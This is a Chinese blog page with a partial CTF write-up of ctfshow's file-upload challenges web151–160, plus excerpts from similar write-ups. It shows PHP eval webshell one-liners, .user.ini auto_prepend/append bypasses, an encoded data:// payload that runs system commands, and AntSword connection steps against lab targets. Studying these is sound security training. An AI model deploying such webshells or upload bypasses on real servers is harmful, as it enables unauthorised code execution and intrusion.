ctfshow web入门 文件上传前篇(web151-web160)

最新推荐文章于 2025-03-11 21:10:38 发布
原创 最新推荐文章于 2025-03-11 21:10:38 发布 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全

本文详细介绍了CTFShow中一系列Web安全挑战,包括利用.user.ini绕过、短标签、过滤字符绕过等技巧,涉及文件上传、命令执行及日志包含等漏洞利用方法,通过实例解析了如何一步步获取flag。

目录

web151-web152

web153

web154

web155

web156

web157-web159

web160

web161

web151-web152

首先写一个一句哈:

<?php @eval($_POST["1"]);?>

然后修改文件后缀为png(题目限制),上传文件同时进行抓包,然后修改后缀php,然后蚁剑连接,找到flag

 

 

 拿到flag~~~~

web153

使用.user.ini绕过

.user.ini

摘抄其他大佬的解释:

指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);这两个设置的区别只是在于auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)所以要求当前目录必须要有php文件

上传.user.ini内容为auto_append_file="xxx"

xxx为我们上传的文件名,这样在php文件上传了我们的木马文件

步骤:</

最低0.47元/天 解锁文章
parkour-
关注
CTFshow 文件上传 web160
Kradress的博客
02-15 724
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 成功上传.user.ini auto_prepend_file=shell.png 继续用取反来解 取反脚本 $a = "data://text/plain,<?php system('tac ../f*');?>"; echo "~("; for ($i = 0; $i < strlen($a); $i++) { echo "%".bin2hex(~$a[$i]); } echo ")"
ctfshowweb151-160
akxnxbshai的博客
02-04 2050
目录 Web 151-152 Web 153 Web 154 Web 155 Web 156 Web 157-159 Web 160 Web 151-152 直接上传文件,然后抓包改后缀 再用蚁剑连一下,找到flag即可 Web 153 php文件无法上传。 发现服务器是nginx,考点是上传.user.ini配置文件,upload文件夹自带一个index.php,使其预加载木马 先后上传文件.user.ini和1.txt(注意抓包改名称) 两个上传后访问/uplo
文件上传+CTF题目
unexpectedthing的博客
10-27 2784
文章目录概念:文件上传绕过:1.绕过js代码:2.绕过服务端(MIME类型)3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门 概念: web客户端在上传文件时,没有对上传文件的内容,扩展名等进行过滤。 文件上传绕过: 1.绕过js代码: (1)一般的web网页端在上传文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上传,利用bp抓包,改数据包扩
CTFshowweb151~160---文件上传(上)
金 帛的博客
06-02 3418
ctfshow的wp
CTFSHOW web160 文件上传
Mirror_iu的博客
07-26 1331
CTFSHOW web160详解
ctfshow web入门文件上传web151————web170(完整)
2202_75289892的博客
08-10 802
题目提示端校验F12查看端代码,更改上传文件类型png为php,以便我们上传php后缀的代码文件。写一句话木马,先命名为.txt,再更改为php后缀:?上传成功,得到上传的路径查看根目录,没找到想要的文件名再往当文件的上级目录找找到flag.php,访问即可。
ctfshow web入门文件上传总结
m0_62207170的博客
11-02 1261
ctfshow web入门文件上传总结
ctfshow web入门 文件上传 web151--web161
2301_81040377的博客
04-07 662
我本来是想用POST的方法获得flag的但是不知道为什么突然用不了了。把Content-Type改为 image/png就可以了。打算用bp改文件形式(可能没操作好)我重新试了一下抓不到。他后面肯定还会过滤东西我们直接搞个升级版。把很多符号过滤了直接摊牌我要看flag。鼠标右键(检查),把png改为php。然后一样的操作上传成功(不会的私信)对php进行了过滤,写一个新马。重新开了靶机发现也可以哈哈哈。上传没有回显加了图片头才行。xxx就是我们上传的文件。然后用的antsword。然后把上传的文件改为。
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
ctfshow [web] 文件上传 156--160
weixin_68906365的博客
02-18 396
可以在User-Agent处写入php代码,在包含日志文件时就可以执行该代码。.user.ini 文件可以正常上传,可以先上传.user.ini 文件然后再上传写有木马的png图片,然后访问/upload页面。可以上传.user.ini文件,new.png也可以正常上传,操作和上题一样。过滤了空格,导致原 .user.ini 文件无法正常上传。可以上传 user.ini 文件,不过木马上传失败了。看了一眼题解,发现括号被过滤了,需要用反引号执行命令。短标签开启:(配置文件:php.ini)
ctfshow-web入门-文件上传web151-web160
Welcome To Myon'Blog !
07-07 2802
试了下端只能传 png 后缀的将一句话木马改成 png 后缀,上传后用 burpsuite 抓包绕过端检测后,改回 php 后缀,发包拿到 flag:ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它端验证的代码:原本只支持上传 png 后缀的文件我们加一个 php 后缀进去,即可直接上传 php 后缀的文件。
ctfshow web入门 151-170文件上传wp
Firebasky的博客
11-12 1117
hhh 还是懒 链接:https://pan.baidu.com/s/1jAxmXznCWTm0UdXPc8VvCg 提取码:m9bw 复制这段内容后打开百度网盘手机App,操作更方便哦
ctfshow文件上传web151
m0_62584974的博客
04-05 1218
2022/4/5 先写一个一句话木马文件 <?php eval($_POST[1]); ?> 试着上传php木马文件 上传失败 查看源码发现只能上传png文件 把它改成php 上传我们刚刚写的木马文件 访问我们刚刚上传的文件 利用Hackbar用post的方式提交 1=system("ls /"); 没有发现flag的文件 查看上一层的目录用post的形式提交 1=system("ls ../"); 发现...
ctfshow——web入门151~156
最新发布
uwvwko的博客
03-11 602
auto_prepend_file在 PHP 中,当用户访问.user.ini所在目录主页文件时,auto_prepend_file所指向的文件内容,会自动进行包含,将文件内容当作php代码执行。如果服务器全局设置了较低的文件上传大小限制,恶意用户可以通过 .user.ini 文件增加 upload_max_filesize 和 post_max_size,来上传更大的文件。</script> //<script>风格,适合过滤<?然后1.php文件写入<?
CTFshow 文件上传 web151
Kradress的博客
02-13 304
目录源码思路题解总结 源码 <script> layui.use('upload', function(){ var upload = layui.upload; //执行实例 var uploadInst = upload.render({ elem: '#upload' //绑定元素 ,url: '/upload/' //上传接口 ,done: function(res){ if(res.code==0){ $("#resu
CTFshow文件上传web入门151-161关解密。包教包会!!!!
2301_77578012的博客
05-23 1678
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
CTFshow_Web_文件上传——web151~web170
Ho1aAs‘s Blog
04-26 2933
文章目录工具题解Web 151~152Web 153Web 154Web 155Web 156Web 157~158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168~170完 工具 Burpsuite php 题解 Web 151~152 页面上,伪装成jpg的一句话木马无法上传,提示后端验证 抓包,修改filename为xxx.php,MIME类型image/png 读取flag直接用通配符 # 151.ph
ctfshow WEB入门 文件上传151-170
byname1的博客
01-07 2008
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow-web151,web152(文件上传)
m0_62094846的博客
01-17 2237
web151 这题如果关闭js文件就无法上传,无法通过绕过台校验的方式进行 就上传png文件抓包后改成php web152 上传png文件抓包后改成php
ctfshow web入门文件上传蚁剑连接
01-02
### CTFShow Web 入门 文件上传 蚁剑 (AntSword) 连接教程 #### 准备工作 为了成功完成文件上传并利用蚁剑建立连接,需先准备环境。确保已安装蚁剑客户端,并准备好用于测试的恶意PHP脚本。 #### PHP Shell Payload 创建 创建一个简单的PHP反向Shell脚本 `shell.php`: ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段允许通过POST请求执行任意命令[^1]。 #### 文件上传过程 使用给定URL进行文件上传操作。假设目标地址为 `http://example.com/upload` ,则可构造如下表单数据提交至服务器: ```html <form action="http://example.com/upload" method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload File" name="submit"> </form> ``` 将之编写的 `shell.php` 作为待上传文件选择并提交[^2]。 #### 验证上传成果 确认文件是否成功上载到远程服务器指定目录下。通常情况下,可以通过浏览器直接访问该路径来验证,例如:`http://example.com/uploads/shell.php` 。如果页面返回空白,则说明上传成功。 #### 使用蚁剑连接 启动蚁剑工具,在新建站点时输入相应的参数配置: - **网站根目录**: `/var/www/html/` - **WebShell URL**: 如所述成功的PHP shell链接 - **密码**: 设置于PHP代码中的密钥 (`cmd`) 按照上述设置完成后点击“保存”,随后即可尝试与远端服务器建立会话连接[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值